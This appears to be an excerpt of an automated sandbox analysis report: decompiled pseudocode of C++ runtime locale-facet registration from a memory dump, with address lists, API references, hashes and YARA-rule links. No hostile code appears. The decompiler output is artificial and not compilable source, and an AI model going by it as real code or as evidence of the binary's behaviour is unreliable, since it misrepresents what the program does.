													__eflags = _t474;
													if(_t474 != 0) {
														L26:
														E6D476A77(_t506 - 0x14);
														return E6D490E67(_t474);
													} else {
														__eflags = _t486;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t506 + 8)));
															_push(_t506 - 0x10);
															__eflags = E6D4827D7(_t358, _t382, _t469, _t474, _t486, __eflags, _t510) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t506 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t358, _t474, _t486);
																E6D476A10(_t506 - 0x14, 0);
																_t487 =  *0x6d53fdc4; // 0x0
																 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																 *(_t506 - 0x10) = _t487;
																_t219 = E6D451D10();
																_t389 =  *((intOrPtr*)(_t506 + 8));
																_t475 = E6D452140( *((intOrPtr*)(_t506 + 8)), _t219);
																__eflags = _t475;
																if(_t475 != 0) {
																	L33:
																	E6D476A77(_t506 - 0x14);
																	return E6D490E67(_t475);
																} else {
																	__eflags = _t487;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t506 + 8)));
																		_push(_t506 - 0x10);
																		__eflags = E6D48283F(_t358, _t389, _t469, _t475, _t487, __eflags, _t510) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t506 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t358, _t475, _t487);
																			E6D476A10(_t506 - 0x14, 0);
																			_t488 =  *0x6d53fdf0; // 0x0
																			 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																			 *(_t506 - 0x10) = _t488;
																			_t232 = E6D451D10();
																			_t396 =  *((intOrPtr*)(_t506 + 8));
																			_t476 = E6D452140( *((intOrPtr*)(_t506 + 8)), _t232);
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L40:
																				E6D476A77(_t506 - 0x14);
																				return E6D490E67(_t476);
																			} else {
																				__eflags = _t488;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t506 + 8)));
																					_push(_t506 - 0x10);
																					__eflags = E6D4828A7(_t358, _t396, _t469, _t476, _t488, __eflags, _t510) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t506 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t358, _t476, _t488);
																						E6D476A10(_t506 - 0x14, 0);
																						_t489 =  *0x6d53fdf4; // 0x0
																						 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																						 *(_t506 - 0x10) = _t489;
																						_t245 = E6D451D10();
																						_t403 =  *((intOrPtr*)(_t506 + 8));
																						_t477 = E6D452140( *((intOrPtr*)(_t506 + 8)), _t245);
																						__eflags = _t477;
																						if(_t477 != 0) {
																							L47:
																							E6D476A77(_t506 - 0x14);
																							return E6D490E67(_t477);
																						} else {
																							__eflags = _t489;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t506 + 8)));
																								_push(_t506 - 0x10);
																								__eflags = E6D48290F(_t358, _t403, _t469, _t477, _t489, __eflags, _t510) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
																									E6D4924F4(_t506 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(0x14);
																									E6D490E9E(0x6d4fe9a2, _t358, _t477, _t489);
																									E6D476A10(_t506 - 0x14, 0);
																									_t490 =  *0x6d53fe10; // 0x0
																									 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																									 *(_t506 - 0x10) = _t490;
																									_t258 = E6D451D10();
																									_t410 =  *((intOrPtr*)(_t506 + 8));
																									_t478 = E6D452140( *((intOrPtr*)(_t506 + 8)), _t258);
																									__eflags = _t478;
																									if(_t478 != 0) {
																										L54:
																										E6D476A77(_t506 - 0x14);
																										return E6D490E67(_t478);
																									} else {
																										__eflags = _t490;
																										if(__eflags == 0) {
																											_push( *((intOrPtr*)(_t506 + 8)));
																											_push(_t506 - 0x10);
																											__eflags = E6D48298A(_t358, _t410, _t469, _t478, _t490, __eflags, _t510) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D451940();
																												E6D4924F4(_t506 - 0x20, 0x6d5329cc);
																												asm("int3");
																												_push(0x14);
																												E6D490E9E(0x6d4fe9a2, _t358, _t478, _t490);
																												E6D476A10(_t506 - 0x14, 0);
																												_t491 =  *0x6d53fde0; // 0x0
																												 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																												 *(_t506 - 0x10) = _t491;
																												_t271 = E6D451D10();
																												_t417 =  *((intOrPtr*)(_t506 + 8));
																												_t479 = E6D452140( *((intOrPtr*)(_t506 + 8)), _t271);
																												__eflags = _t479;
																												if(_t479 != 0) {
																													L61:
																													E6D476A77(_t506 - 0x14);
																													return E6D490E67(_t479);
																												} else {
																													__eflags = _t491;
																													if(__eflags == 0) {
																														_push( *((intOrPtr*)(_t506 + 8)));
																														_push(_t506 - 0x10);
																														__eflags = E6D4829F6(_t358, _t417, _t469, _t479, _t491, __eflags, _t510) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D451940();
																															E6D4924F4(_t506 - 0x20, 0x6d5329cc);
																															asm("int3");
																															_push(0x14);
																															E6D490E9E(0x6d4fe9a2, _t358, _t479, _t491);
																															E6D476A10(_t506 - 0x14, 0);
																															_t492 =  *0x6d53fe14; // 0x0
																															 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																															 *(_t506 - 0x10) = _t492;
																															_t284 = E6D451D10();
																															_t424 =  *((intOrPtr*)(_t506 + 8));
																															_t480 = E6D452140( *((intOrPtr*)(_t506 + 8)), _t284);
																															__eflags = _t480;
																															if(_t480 != 0) {
																																L68:
																																E6D476A77(_t506 - 0x14);
																																return E6D490E67(_t480);
																															} else {
																																__eflags = _t492;
																																if(__eflags == 0) {
																																	_push( *((intOrPtr*)(_t506 + 8)));
																																	_push(_t506 - 0x10);
																																	__eflags = E6D482A62(_t358, _t424, _t469, _t480, _t492, __eflags, _t510) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D451940();
																																		E6D4924F4(_t506 - 0x20, 0x6d5329cc);
																																		asm("int3");
																																		_push(0x14);
																																		E6D490E9E(0x6d4fe9a2, _t358, _t480, _t492);
																																		E6D476A10(_t506 - 0x14, 0);
																																		_t493 =  *0x6d53fde4; // 0x0
																																		 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																																		 *(_t506 - 0x10) = _t493;
																																		_t297 = E6D451D10();
																																		_t431 =  *((intOrPtr*)(_t506 + 8));
																																		_t481 = E6D452140( *((intOrPtr*)(_t506 + 8)), _t297);
																																		__eflags = _t481;
																																		if(_t481 != 0) {
																																			L75:
																																			E6D476A77(_t506 - 0x14);
																																			return E6D490E67(_t481);
																																		} else {
																																			__eflags = _t493;
																																			if(__eflags == 0) {
																																				_push( *((intOrPtr*)(_t506 + 8)));
																																				_push(_t506 - 0x10);
																																				__eflags = E6D482AC8(_t358, _t431, _t469, _t481, _t493, __eflags, _t510) - 0xffffffff;
																																				if(__eflags == 0) {
																																					_t435 = _t506 - 0x20;
																																					E6D451940();
																																					E6D4924F4(_t506 - 0x20, 0x6d5329cc);
																																					asm("int3");
																																					_push(4);
																																					E6D490E9E(0x6d4fefbc, _t358, _t481, _t493);
																																					_t494 = _t435;
																																					 *(_t506 - 0x10) = _t494;
																																					 *((intOrPtr*)(_t494 + 4)) =  *((intOrPtr*)(_t506 + 0xc));
																																					_push( *((intOrPtr*)(_t506 + 0x14)));
																																					_push( *((intOrPtr*)(_t506 + 8)));
																																					_t161 = _t506 - 4;
																																					 *_t161 =  *(_t506 - 4) & 0x00000000;
																																					__eflags =  *_t161;
																																					 *_t494 = 0x6d5041ac;
																																					 *((char*)(_t494 + 0x28)) =  *((intOrPtr*)(_t506 + 0x10));
																																					E6D4868B7(_t358, _t435, _t469, _t481, _t494,  *_t161, _t510);
																																					return E6D490E67(_t494);
																																				} else {
																																					_t481 =  *(_t506 - 0x10);
																																					 *(_t506 - 0x10) = _t481;
																																					 *(_t506 - 4) = 1;
																																					E6D478A0B(__eflags, _t481);
																																					 *0x6d5001e8();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
																																					 *0x6d53fde4 = _t481;
																																					goto L75;
																																				}
																																			} else {
																																				_t481 = _t493;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t480 =  *(_t506 - 0x10);
																																		 *(_t506 - 0x10) = _t480;
																																		 *(_t506 - 4) = 1;
																																		E6D478A0B(__eflags, _t480);
																																		 *0x6d5001e8();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
																																		 *0x6d53fe14 = _t480;
																																		goto L68;
																																	}
																																} else {
																																	_t480 = _t492;
																																	goto L68;
																																}
																															}
																														} else {
																															_t479 =  *(_t506 - 0x10);
																															 *(_t506 - 0x10) = _t479;
																															 *(_t506 - 4) = 1;
																															E6D478A0B(__eflags, _t479);
																															 *0x6d5001e8();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
																															 *0x6d53fde0 = _t479;
																															goto L61;
																														}
																													} else {
																														_t479 = _t491;
																														goto L61;
																													}
																												}
																											} else {
																												_t478 =  *(_t506 - 0x10);
																												 *(_t506 - 0x10) = _t478;
																												 *(_t506 - 4) = 1;
																												E6D478A0B(__eflags, _t478);
																												 *0x6d5001e8();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
																												 *0x6d53fe10 = _t478;
																												goto L54;
																											}
																										} else {
																											_t478 = _t490;
																											goto L54;
																										}
																									}
																								} else {
																									_t477 =  *(_t506 - 0x10);
																									 *(_t506 - 0x10) = _t477;
																									 *(_t506 - 4) = 1;
																									E6D478A0B(__eflags, _t477);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t477 + 4))))();
																									 *0x6d53fdf4 = _t477;
																									goto L47;
																								}
																							} else {
																								_t477 = _t489;
																								goto L47;
																							}
																						}
																					} else {
																						_t476 =  *(_t506 - 0x10);
																						 *(_t506 - 0x10) = _t476;
																						 *(_t506 - 4) = 1;
																						E6D478A0B(__eflags, _t476);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 4))))();
																						 *0x6d53fdf0 = _t476;
																						goto L40;
																					}
																				} else {
																					_t476 = _t488;
																					goto L40;
																				}
																			}
																		} else {
																			_t475 =  *(_t506 - 0x10);
																			 *(_t506 - 0x10) = _t475;
																			 *(_t506 - 4) = 1;
																			E6D478A0B(__eflags, _t475);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t475 + 4))))();
																			 *0x6d53fdc4 = _t475;
																			goto L33;
																		}
																	} else {
																		_t475 = _t487;
																		goto L33;
																	}
																}
															} else {
																_t474 =  *(_t506 - 0x10);
																 *(_t506 - 0x10) = _t474;
																 *(_t506 - 4) = 1;
																E6D478A0B(__eflags, _t474);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t474 + 4))))();
																 *0x6d53fdec = _t474;
																goto L26;
															}
														} else {
															_t474 = _t486;
															goto L26;
														}
													}
												} else {
													_t473 =  *(_t506 - 0x10);
													 *(_t506 - 0x10) = _t473;
													 *(_t506 - 4) = 1;
													E6D478A0B(__eflags, _t473);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t473 + 4))))();
													 *0x6d53fdd8 = _t473;
													goto L19;
												}
											} else {
												_t473 = _t485;
												goto L19;
											}
										}
									} else {
										_t472 =  *(_t506 - 0x10);
										 *(_t506 - 0x10) = _t472;
										 *(_t506 - 4) = 1;
										E6D478A0B(__eflags, _t472);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t472 + 4))))();
										 *0x6d53fddc = _t472;
										goto L12;
									}
								} else {
									_t472 = _t484;
									goto L12;
								}
							}
						} else {
							_t471 =  *(_t506 - 0x10);
							 *(_t506 - 0x10) = _t471;
							 *(_t506 - 4) = 1;
							E6D478A0B(__eflags, _t471);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 4))))();
							 *0x6d53fe08 = _t471;
							goto L5;
						}
					} else {
						_t471 = _t483;
						goto L5;
					}
				}
			}

0x6d480a9c
0x6d480a9c
0x6d480a9c
0x6d480aa3
0x6d480aad
0x6d480ab2
0x6d480abd
0x6d480ac1
0x6d480ac4
0x6d480ac9
0x6d480acd
0x6d480ad2
0x6d480ad6
0x6d480b1b
0x6d480b1e
0x6d480b2a
0x6d480ad8
0x6d480ada
0x6d480ae0
0x6d480ae6
0x6d480aee
0x6d480af1
0x6d480b2e
0x6d480b3c
0x6d480b41
0x6d480b42
0x6d480b49
0x6d480b53
0x6d480b58
0x6d480b63
0x6d480b67
0x6d480b6a
0x6d480b6f
0x6d480b78
0x6d480b7a
0x6d480b7c
0x6d480bc1
0x6d480bc4
0x6d480bd0
0x6d480b7e
0x6d480b7e
0x6d480b80
0x6d480b86
0x6d480b8c
0x6d480b94
0x6d480b97
0x6d480bd4
0x6d480be2
0x6d480be7
0x6d480be8
0x6d480bef
0x6d480bf9
0x6d480bfe
0x6d480c09
0x6d480c0d
0x6d480c10
0x6d480c15
0x6d480c1e
0x6d480c20
0x6d480c22
0x6d480c67
0x6d480c6a
0x6d480c76
0x6d480c24
0x6d480c24
0x6d480c26
0x6d480c2c
0x6d480c32
0x6d480c3a
0x6d480c3d
0x6d480c7a
0x6d480c88
0x6d480c8d
0x6d480c8e
0x6d480c95
0x6d480c9f
0x6d480ca4
0x6d480caf
0x6d480cb3
0x6d480cb6
0x6d480cbb
0x6d480cc4
0x6d480cc6
0x6d480cc8
0x6d480d0d
0x6d480d10
0x6d480d1c
0x6d480cca
0x6d480cca
0x6d480ccc
0x6d480cd2
0x6d480cd8
0x6d480ce0
0x6d480ce3
0x6d480d20
0x6d480d2e
0x6d480d33
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d6a
0x6d480d6c
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc
0x6d480c3f
0x6d480c3f
0x6d480c42
0x6d480c46
0x6d480c4a
0x6d480c57
0x6d480c5f
0x6d480c61
0x00000000
0x6d480c61
0x6d480c28
0x6d480c28
0x00000000
0x6d480c28
0x6d480c26
0x6d480b99
0x6d480b99
0x6d480b9c
0x6d480ba0
0x6d480ba4
0x6d480bb1
0x6d480bb9
0x6d480bbb
0x00000000
0x6d480bbb
0x6d480b82
0x6d480b82
0x00000000
0x6d480b82
0x6d480b80
0x6d480af3
0x6d480af3
0x6d480af6
0x6d480afa
0x6d480afe
0x6d480b0b
0x6d480b13
0x6d480b15
0x00000000
0x6d480b15
0x6d480adc
0x6d480adc
0x00000000
0x6d480adc
0x6d480ada

APIs

__EH_prolog3.LIBCMT ref: 6D480AA3
std::_Lockit::_Lockit.LIBCPMT ref: 6D480AAD

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

moneypunct.LIBCPMT ref: 6D480AE7
std::_Facet_Register.LIBCPMT ref: 6D480AFE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480B1E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480B3C

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 21e7b52b156b2e0669e50e7d6d13d2526a1b5a8791ae0f5c04656fbb3d632d3b
Instruction ID: 159880a051bd0091e8134d7548f6d7eafc48328174261f07046a2a3989c3389d
Opcode Fuzzy Hash: 21e7b52b156b2e0669e50e7d6d13d2526a1b5a8791ae0f5c04656fbb3d632d3b
Instruction Fuzzy Hash: F511AC329042298BCF05DFA6C880EEE7775AF85368F26040DD611AB291DF74DE41CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48056C, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D48056C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;
				void* _t862;

				_t797 = __edx;
				_t606 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t858 - 0x14, 0);
				_t819 =  *0x6d53fde8; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6D451D10();
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6D476A77(_t858 - 0x14);
					return E6D490E67(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
						__eflags = E6D4822E5(__ebx, _t609, __edx, _t799, _t819, __eflags, _t862) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t858 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t799, _t819);
							E6D476A10(_t858 - 0x14, 0);
							_t820 =  *0x6d53fdfc; // 0x0
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6D451D10();
							_t616 =  *((intOrPtr*)(_t858 + 8));
							_t800 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6D476A77(_t858 - 0x14);
								return E6D490E67(_t800);
							} else {
								__eflags = _t820;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6D482355(_t606, _t616, __edx, _t800, _t820, __eflags, _t862) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t858 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t606, _t800, _t820);
										E6D476A10(_t858 - 0x14, 0);
										_t821 =  *0x6d53fdcc; // 0x0
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6D451D10();
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6D476A77(_t858 - 0x14);
											return E6D490E67(_t801);
										} else {
											__eflags = _t821;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6D4823BD(_t606, _t623, __edx, _t801, _t821, __eflags, _t862) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t858 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t606, _t801, _t821);
													E6D476A10(_t858 - 0x14, 0);
													_t822 =  *0x6d53fe00; // 0x0
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6D451D10();
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6D476A77(_t858 - 0x14);
														return E6D490E67(_t802);
													} else {
														__eflags = _t822;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6D482425(_t606, _t630, _t797, _t802, _t822, __eflags, _t862) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t606, _t802, _t822);
																E6D476A10(_t858 - 0x14, 0);
																_t823 =  *0x6d53fdd0; // 0x0
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6D451D10();
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6D476A77(_t858 - 0x14);
																	return E6D490E67(_t803);
																} else {
																	__eflags = _t823;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6D48248D(_t606, _t637, _t797, _t803, _t823, __eflags, _t862) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t606, _t803, _t823);
																			E6D476A10(_t858 - 0x14, 0);
																			_t824 =  *0x6d53fe04; // 0x0
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6D451D10();
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6D476A77(_t858 - 0x14);
																				return E6D490E67(_t804);
																			} else {
																				__eflags = _t824;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6D4824F5(_t606, _t644, _t797, _t804, _t824, __eflags, _t862) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t606, _t804, _t824);
																						E6D476A10(_t858 - 0x14, 0);
																						_t825 =  *0x6d53fdd4; // 0x0
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6D451D10();
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6D476A77(_t858 - 0x14);
																							return E6D490E67(_t805);
																						} else {
																							__eflags = _t825;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6D48255D(_t606, _t651, _t797, _t805, _t825, __eflags, _t862) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
																									E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(0x14);
																									E6D490E9E(0x6d4fe9a2, _t606, _t805, _t825);
																									E6D476A10(_t858 - 0x14, 0);
																									_t826 =  *0x6d53fe0c; // 0x0
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6D451D10();
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
